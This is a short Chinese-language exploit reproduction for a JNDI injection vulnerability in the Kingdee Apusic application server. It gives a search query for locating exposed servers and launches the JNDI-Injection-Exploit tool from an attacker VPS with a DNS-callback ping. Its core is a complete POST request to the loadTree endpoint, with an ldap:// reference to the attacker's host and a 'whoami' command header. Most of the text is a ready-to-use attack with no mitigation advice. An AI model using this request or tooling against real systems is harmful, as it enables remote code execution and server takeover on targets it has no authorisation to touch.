金蝶 Apusic应用服务器(中间件) loadTree JNDI注入漏洞
一、漏洞简介
金蝶Apusic应用服务器是国内第一个通过J2EE测试认证的应用服务器,全球第四家获得JavaEE 5.0认证授权的产品,完全实现J2EE等企业计算相关的工业规范及标准代码简洁优化,具备了数据持久性、事务完整性、消息传输的可靠性、集群功能的高可用性、以及跨平台的支持等特点。金蝶Apusic应用服务器存在JNDI注入漏洞,攻击者可利用该漏洞获取服务器控制权限。
二、影响版本
- 金蝶Apusic应用服务器
三、资产测绘
- hunter
app.name="Apusic 金蝶天燕 Server"&&web.title=="Welcome to Apusic Application Server"
- 特征
四、漏洞复现
- 获取dns
id0369.dnslog.cn
- 将
JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
上传到vps
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 172.245.154.22 -C "ping id0369.dnslog.cn"
- 漏洞利用
POST /appmonitor//protect/jndi/loadTree HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887.0 Safari/532.1
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-type: application/x-www-form-urlencoded
Content-Length: 32
cmd: whoami
Connection: close
jndiName=ldap://172.245.154.22:1389/zdsghu
- 获取响应